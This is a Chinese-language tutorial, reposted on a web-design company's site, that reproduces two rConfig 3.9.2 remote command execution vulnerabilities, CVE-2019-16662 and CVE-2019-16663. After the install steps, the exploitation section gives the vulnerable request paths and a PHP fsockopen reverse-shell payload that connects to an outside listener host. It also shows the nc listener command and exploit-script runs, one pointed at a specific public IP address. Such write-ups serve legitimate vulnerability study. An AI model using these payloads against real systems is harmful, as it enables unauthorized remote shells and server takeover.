如何进行rConfig-CVE漏洞复现及环境搭建-成都创新互联网站建设

关于创新互联

多方位宣传企业产品与服务 突出企业形象

公司简介 公司的服务 荣誉资质 新闻动态 联系我们

如何进行rConfig-CVE漏洞复现及环境搭建

今天就跟大家聊聊有关如何进行rConfig-CVE漏洞复现及环境搭建,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。

盐湖ssl适用于网站、小程序/APP、API接口等需要进行数据传输应用场景,ssl证书未来市场广阔!成为创新互联的ssl证书销售渠道,可以享受市场价格4-6折优惠!如果有意向欢迎电话联系或者加微信:028-86922220(备注:SSL证书合作)期待与您的合作!

rConfig是一个开放源代码的网络设备配置管理实用程序,网络工程师可以使用它来频繁获取其网络设备的配置快照。rConfig是唯一的,因为您选择要针对设备运行的命令。

只需使用要应用于设备类别的命令列表配置rConfig,然后将设备添加到该类别。创建一个计划任务,其余工作由rConfig完成。现在,rConfig版本3具有配置符合性管理实用程序,使您可以监视设备配置以符合策略。

如何进行rConfig-CVE漏洞复现及环境搭建

一、环境搭建

rConfig安装

cd /home

curl -O https://www.rconfig.com/downloads/scripts/install_rConfig.sh -A "Mozilla"

chmod +x install_rConfig.sh

./install_rConfig.sh

如何进行rConfig-CVE漏洞复现及环境搭建

如何进行rConfig-CVE漏洞复现及环境搭建

运行文件安装发现报错 我们打开源码看看为什么连接不上

如何进行rConfig-CVE漏洞复现及环境搭建

结果发现会curl访问一下谷歌来判断是否有网 我们可以直接改成www.baidu.com,但是后面安装可能会刚问一写被墙的连接,所以我们保险起见,挂个代理把!!!我这里用的是proxychains4代理的我内网的一个ss。

如何进行rConfig-CVE漏洞复现及环境搭建

然后就可以直接正常安装了。

如何进行rConfig-CVE漏洞复现及环境搭建

安装完成之后会有一个centos7_postReboot.sh文件

如何进行rConfig-CVE漏洞复现及环境搭建

我们接着运行一下 就可以看见已经安装完成了。剩下就去web页面配置了。

如何进行rConfig-CVE漏洞复现及环境搭建

进入https://192.168.157.130/install页面进行后续安装

如何进行rConfig-CVE漏洞复现及环境搭建

如何进行rConfig-CVE漏洞复现及环境搭建

如何进行rConfig-CVE漏洞复现及环境搭建

 

到此安装均已完成,默认账号密码为admin admin。

二、漏洞复现

rConfig 3.9.2及更低版本中的未经身份验证的命令执行漏洞。安装后,安装目录不会自动删除,这允许未经身份验证的用户通过ajaxServerSettingsChk.php文件作为Web服务器用户执行任意命令。

CVE-2019-16662 rConfig3.9.2远程命令执行漏洞复现:

为了直观,我自己在服务器上搭建了一个rConfig3.9.2系统,现在我们来抓包复现一下漏洞

如何进行rConfig-CVE漏洞复现及环境搭建

我们将路径替换成存在漏的/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=

如何进行rConfig-CVE漏洞复现及环境搭建

下面我们需要将命令执行一道url编码 然后再填入参数即可。

如何进行rConfig-CVE漏洞复现及环境搭建

如何进行rConfig-CVE漏洞复现及环境搭建

已经输出了我们的回显,现在我们来弹个shell试一下

将url编码;php -r '$sock=fsockopen("XX.XX.XX.XX",6633);exec("/bin/sh -i <&3 >&3 2>&3");'#

如何进行rConfig-CVE漏洞复现及环境搭建

另一个外网服务器进行监听 nc -lvnp 6633

如何进行rConfig-CVE漏洞复现及环境搭建

添加参数发送请求,可以看到已经反弹到shell了。

如何进行rConfig-CVE漏洞复现及环境搭建

CVE-2019-16662Exp脚本利用

如何进行rConfig-CVE漏洞复现及环境搭建

python rConfig-CVE-2019-16662.py https://154.221.20.69 XX.XX.XX.XX 6634

如何进行rConfig-CVE漏洞复现及环境搭建

CVE-2019-16663 rConfig3.9.2远程命令执行漏洞复现

这个RCE需要身份验证才能执行,存在lib/crud/search.crud.php这个文件里。

如何进行rConfig-CVE漏洞复现及环境搭建

登录成功之后进行抓包 替换成RCE的路径 将反弹shell的payload进行编码

""&&php -r '$sock=fsockopen("XX.XX.XX.XX",6635);exec("/bin/sh -i <&3 >&3 2>&3");'#

如何进行rConfig-CVE漏洞复现及环境搭建

监听,反弹,成功

如何进行rConfig-CVE漏洞复现及环境搭建

CVE-2019-16663 EXP利用

如何进行rConfig-CVE漏洞复现及环境搭建

python rConfig-CVE-2019-16663.py https://154.221.20.69 admin admin IP 6636

如何进行rConfig-CVE漏洞复现及环境搭建

CVE-2019-19509 rConfig3.9.3远程命令执行漏洞

由于3.9.3的安装包被官方删除和下架了,现在无法复现,但网上已有Exp。

如何进行rConfig-CVE漏洞复现及环境搭建

看完上述内容,你们对如何进行rConfig-CVE漏洞复现及环境搭建有进一步的了解吗?如果还想了解更多知识或者相关内容,请关注创新互联行业资讯频道,感谢大家的支持。


网站题目:如何进行rConfig-CVE漏洞复现及环境搭建
地址分享:http://kswsj.cn/article/piggdd.html

其他资讯